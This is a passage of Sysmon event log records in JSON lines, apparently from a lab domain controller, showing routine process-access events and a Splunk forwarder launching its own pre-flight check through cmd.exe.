05:48:41.902","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3268,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.902\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-00103D2B0500}\r\nTargetProcessId: 4188\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.902","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-00103D2B0500}","TargetProcessId":"4188","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3269,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.137\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103D2B0500}\r\nSourceProcessId: 4188\r\nSourceThreadId: 3376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.137","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103D2B0500}","SourceProcessId":"4188","SourceThreadId":"3376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3270,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.153\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.153","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3271,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.193\r\nProcessGuid: {A837DB8D-023A-5F25-0000-0010582F0500}\r\nProcessId: 4300\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal pre-flight-checks --answer-yes --no-prompt 2>&1\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.193","ProcessGuid":"{A837DB8D-023A-5F25-0000-0010582F0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal pre-flight-checks --answer-yes --no-prompt 2&gt;&amp;1","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3272,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.184\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 4232\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-023A-5F25-0000-0010582F0500}\r\nTargetProcessId: 4300\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+eef54|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ebd15|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.184","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"4232","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-023A-5F25-0000-0010582F0500}","TargetProcessId":"4300","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+eef54|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ebd15|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3273,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.184\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023A-5F25-0000-0010582F0500}\r\nTargetProcessId: 4300\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.184","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023A-5F25-0000-0010582F0500}","TargetProcessId":"4300","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3274,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.184\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.184","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3275,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.184\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.184","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3276,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.184\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 